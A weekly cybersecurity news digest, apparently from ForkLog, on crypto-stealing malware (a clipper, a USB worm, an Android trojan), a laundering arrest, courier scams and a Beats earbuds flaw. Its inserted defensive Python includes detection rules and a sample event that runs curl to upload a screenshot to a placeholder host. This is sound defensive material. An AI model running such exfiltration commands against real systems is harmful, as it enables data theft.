We’ve compiled the most important cybersecurity news from the past week.
- A crypto clipper was spread using fake reputations on GitHub and YouTube.
- A USB worm self-replicated through hidden Windows shortcuts to steal cryptocurrency.
- South Korean law enforcement dismantled a cryptocurrency laundering network for a Cambodian syndicate.
- Researchers discovered a new Android trojan designed to steal cryptocurrency.
Crypto Clipper Spread Using Fake Reputation on GitHub and YouTube
An unknown attacker launched a large-scale campaign to distribute malware, employing legitimate marketing techniques to create a fake "reputation economy." This was reported by Check Point Research.
The ultimate goal of the attacks is to implant crypto clippers disguised as trading tools within the Solana and Pump.fun ecosystems, as well as software for predicting betting outcomes.
Phishing page. Source: Check Point Research.
According to experts, the clipper is written in Rust and targets Windows and macOS operating systems. The malware operates stealthily, continuously monitoring the device's clipboard. When it detects a copied cryptocurrency wallet address, it instantly replaces it with the attacker’s details, redirecting digital assets.
To gain the trust of victims—primarily crypto investors and online gamers—the hacker built a complex cross-platform infrastructure of "ghost networks." Analysts observed coordinated activity on VirusTotal: a cluster of fake accounts left positive comments and likes en masse to falsely classify the malicious files as safe.
This manipulation of metrics is also applied on other platforms:
- GitHub and SourceForge. The attacker manages a network of accounts to mutually promote repositories. On SourceForge, the download counter was artificially inflated to 44,000 using an Android device farm;
- YouTube. A channel with over 91,000 subscribers is used to advertise the software. Tutorial videos are created using AI voice generators and accompanied by inflated positive comments;
- Media. To legitimize the tool, the hacker uses press release distribution services (e.g., EIN Presswire), whose publications are then automatically republished by partner news sites.
Check Point researchers emphasized that manipulating crowdsourcing platforms indicates a dangerous shift in social engineering tactics. The successfully tested scheme of cross-platform reputation inflation could be applied in the future for the widespread distribution of ransomware and more sophisticated info stealers.
USB Worm Self-Replicates Through Hidden Windows Shortcuts to Steal Cryptocurrency
Microsoft experts revealed details of a self-replicating malware campaign targeting cryptocurrency owners.
The infection process is triggered when a victim opens a modified shortcut file (.LNK) on a USB drive. Once activated, the worm stealthily installs additional payloads from a command server located in the .onion domain.
The malware scans the local system for user documents. Upon finding them, it hides the originals and replaces them with malicious shortcuts that have identical names. As a result, the malware activates every time the user attempts to open their work files. To self-replicate, the worm creates a scheduled task that monitors the USB ports. As soon as a new USB drive is inserted, the worm instantly copies itself onto the external storage.
Infection scheme. Source: Microsoft.
The stealer only becomes active if the "Task Manager" is not running. It connects to the command server via an embedded Tor executable and monitors the clipboard for sensitive data every half second:
- 12- and 24-word BIP39 seed phrases;
- wallet addresses for Bitcoin (Legacy, P2SH, Bech32, and Taproot formats), Ethereum, Tron, and Monero.
Upon detecting a copied address, the program instantly replaces it with the attacker’s details. To deceive the victim, the algorithm selects wallets whose initial characters visually match the originals.
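The look-alike trick described above works because people glance at the first few characters of an address. The following added example (not code from Microsoft's report) shows a defensive check that compares the copied address with the one about to be sent and reports how long the visually matching prefix is; the first address is the Bech32 example from BIP173, the second is a constructed, non-valid look-alike.

```python
from dataclasses import dataclass


@dataclass
class SwapVerdict:
    swapped: bool        # pasted text is not the address that was copied
    shared_prefix: int   # leading characters the two strings have in common
    shared_suffix: int   # trailing characters in common (0 when none)


def compare_addresses(copied: str, pasted: str) -> SwapVerdict:
    """Compare the address the user copied with the one about to be sent.

    Only exact equality counts as safe. The prefix/suffix counts explain why
    checking only the start (or start and end) of an address misses a swap.
    """
    a, b = copied.strip(), pasted.strip()
    if a == b:
        return SwapVerdict(False, len(a), len(a))
    prefix = 0
    for x, y in zip(a, b):
        if x != y:
            break
        prefix += 1
    suffix = 0
    for x, y in zip(reversed(a), reversed(b)):
        # stop at the first mismatch, or before overlapping the prefix
        if x != y or prefix + suffix >= min(len(a), len(b)):
            break
        suffix += 1
    return SwapVerdict(True, prefix, suffix)


# Sample inputs: BIP173 example address, and a constructed look-alike that
# shares its first eight characters (not a real wallet).
COPIED = "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq"
PASTED_SWAPPED = "bc1qar0s9k2m4u7x3p8qz6h5r2t9wjd4c7v0nm3l8e"

if __name__ == "__main__":
    v = compare_addresses(COPIED, PASTED_SWAPPED)
    print(f"swapped={v.swapped} shared_prefix={v.shared_prefix} "
          f"shared_suffix={v.shared_suffix}")
```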
In addition to clipboard interception, the virus takes five screenshots every ten seconds and sends them to the hackers using the curl utility. On a special command from the server, the software can download and execute arbitrary JavaScript scripts on the infected machine.
The activity of this USB worm has been continuously recorded since at least February. Researchers noted that the most obvious indicators of infection are behavioral rather than signature-based. The main "red flags" of a breach include suspicious background activity from the processes wscript.exe and cscript.exe, unexpected launches of curl, PowerShell, and cmd.exe, as well as unauthorized network connections to localhost:9050 (the default Tor SOCKS proxy port).
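The behavioral indicators listed above translate directly into detection rules. The following added example (not from Microsoft's report) runs two such rules over constructed Sysmon-style events with assumed field names: a script host (wscript.exe or cscript.exe) spawning curl, PowerShell, or cmd.exe, and any process connecting to the loopback address on port 9050.

```python
# Constructed sample telemetry in a Sysmon-like shape (assumed field names):
# process-creation and network-connection events, benign ones included.
SAMPLE_EVENTS = [
    {"kind": "process", "pid": 1201, "parent_image": "explorer.exe",
     "image": "wscript.exe", "cmdline": 'wscript.exe //B "E:\\Docs\\report.vbs"'},
    {"kind": "process", "pid": 1340, "parent_image": "wscript.exe",
     "image": "curl.exe", "cmdline": "curl.exe -s --data-binary @shot.png http://placeholder.invalid/"},
    {"kind": "process", "pid": 1355, "parent_image": "wscript.exe",
     "image": "cmd.exe", "cmdline": "cmd.exe /c schtasks /query"},
    {"kind": "network", "pid": 1201, "image": "wscript.exe",
     "dst_ip": "127.0.0.1", "dst_port": 9050},
    {"kind": "process", "pid": 2001, "parent_image": "explorer.exe",
     "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"kind": "network", "pid": 2001, "image": "chrome.exe",
     "dst_ip": "203.0.113.10", "dst_port": 443},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SUSPECT_CHILDREN = {"curl.exe", "powershell.exe", "cmd.exe"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}
TOR_SOCKS_PORT = 9050


def flag_events(events):
    """Return (rule_id, pid, detail) tuples for events matching the two rules."""
    hits = []
    for ev in events:
        image = ev.get("image", "").lower()
        if ev["kind"] == "process":
            parent = ev.get("parent_image", "").lower()
            if parent in SCRIPT_HOSTS and image in SUSPECT_CHILDREN:
                hits.append(("script-host-spawn", ev["pid"],
                             f"{parent} launched {image}: {ev['cmdline']}"))
        elif ev["kind"] == "network":
            if ev["dst_ip"] in LOOPBACK and ev["dst_port"] == TOR_SOCKS_PORT:
                hits.append(("tor-socks-loopback", ev["pid"],
                             f"{image} connected to {ev['dst_ip']}:{ev['dst_port']}"))
    return hits


if __name__ == "__main__":
    for rule, pid, detail in flag_events(SAMPLE_EVENTS):
        print(f"[{rule}] pid={pid} {detail}")
```

A single hit is a lead, not a verdict; the script host and the loopback Tor connection from the same process tree together are what make the pattern distinctive.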
South Korean Law Enforcement Dismantles Cryptocurrency Laundering Network for Cambodian Syndicate
South Korean law enforcement has arrested 23 suspects in a case involving money laundering for a Cambodian phishing organization. This was reported by Newsis.
The scheme was carried out through a complex transaction routing network utilizing both domestic South Korean and foreign cryptocurrency exchanges. According to the investigation, from February 2024 to April 2025, the group moved approximately 11.1 million USDT.
The police highlighted the colossal scale of the infrastructure involved: the criminals used around 11,300 different accounts for money laundering. These transit accounts were directly linked to stolen funds totaling approximately $17 million, which the criminals obtained from 265 incidents.
During police raids, criminal proceeds amounting to 650 million won (about $430,000) were seized. However, the active phase of the operation is not yet complete: the alleged leader of the group remains at large. An Interpol "red notice" has already been issued for him, indicating an international search and extradition.
Researchers Discover New Android Trojan for Stealing Cryptocurrency
Security researchers at Zimperium discovered a Trojan for Android aimed at stealing cryptocurrency.
According to analysts, the Rokarolla malware arsenal includes 137 remote commands. The toolkit allows for intercepting PIN codes, reading and sending SMS, manipulating the clipboard to steal digital assets, and forcibly disabling built-in OS protection mechanisms.
The software spreads through malicious websites masquerading as installers for popular services like TikTok and Google Chrome.
In the first stage, the victim downloads a program that visually mimics a system component of Google Play Protect. Using this disguise, the dropper employs social engineering to compel the user to grant access to "Special Features." Once permission is obtained, the malware deploys its main payload and immediately disables the real Play Protect scanner.
Permission request by the Rokarolla Trojan. Source: Zimperium.
Rokarolla downloads fake HTML login pages for each active application from its server. When the victim opens a legitimate crypto wallet, the Trojan instantly overlays it with a fake window and intercepts all entered credentials.
Additionally, a separate overlay precisely mimics the standard Android lock screen. This allows the malware to steal the PIN code, password, or graphical key, giving operators the ability to control the smartphone even when it is locked. To steal cryptocurrency, the Trojan employs an embedded clipper: it stealthily monitors the clipboard and replaces copied wallet addresses with the attackers’ details, redirecting transactions.
To bypass two-factor authentication, Rokarolla reads all SMS on the device and can send messages on its own, intercepting one-time banking codes. Furthermore, by designating itself as the default app for calls and SMS, the Trojan can block incoming calls—thus, a warning call from the bank's anti-fraud system simply won’t reach the owner.
Experts emphasized that the main defense against such threats is heightened vigilance when granting permissions to "Special Features," as these trigger the entire attack chain.
Cryptoscammers Hired Couriers to Collect Cash
Criminals have started hiring couriers to collect funds from victims whose transactions are blocked by banking security systems. This new tactic by operators of cryptocurrency "pig butchering" schemes was reported by the FBI.
Typically, such scams begin with fraudsters contacting potential victims through social media, dating sites, and messaging apps, gaining their trust, and then luring them into fake investment schemes.
Once the victim is convinced to withdraw cash (for example, under the pretext of a temporary "freeze" on their account), the scammers send a courier to the trusting individual. A pre-agreed password or the serial number of a specific dollar bill is used for identification. After receiving the money, the scammers simulate an increase in the victim's virtual wallet balance and restart the cycle, demanding new contributions to pay fictitious "taxes" on withdrawals.
According to FBI data for 2025, cryptocurrency and investment scams remain the "most destructive form" of cybercrime in the U.S., accounting for 49% of all incidents with a total loss of $8.6 billion.
Vulnerability in Wireless Earbuds Allowed Hackers to Eavesdrop on iPhone Users
Apple released a firmware update for the Beats Studio Buds wireless earbuds, addressing a high-severity vulnerability.
The flaw, reported by SentinelOne back in January, allowed attackers to secretly connect to the device and use the built-in microphone for eavesdropping.
The issue, identified as CVE-2025-20701, is related to improper authorization in the Bluetooth audio SDK from chip developer Airoha. The defect allows a hacker within Bluetooth range to remotely connect their equipment to the earbuds without the user’s knowledge or consent, provided the headset is not yet paired and is actively searching for connections. The vulnerability has been successfully patched in the Beats firmware update version 1B211.
Experts noted that the exploit can be triggered over classic Bluetooth or Bluetooth Low Energy (BLE) without any authentication. In addition to eavesdropping, the attack gives hackers nearly complete control over the device: it allows reading and rewriting the earbuds' RAM and flash memory. Moreover, hackers can intercept established trust relationships with previously paired smartphones, opening a vector for more complex multi-stage attacks.
Also on ForkLog:
- An outdated contract on the Aztec network was hacked for $2 million.
- Kentucky, following other states, has filed a lawsuit against Polymarket.
- The UK will ban social media for children under 16.
- The Supreme Court of Russia recognized cryptocurrency as a subject of theft.
- Bitbank threatened to block transactions related to Polymarket.
What to Read This Weekend?
Ideas that change the world often emerge from the periphery—from people whom contemporaries consider oddballs. In a new piece, ForkLog explores why pioneers like Jack Parsons often remain in the shadows of the revolutions they have created.
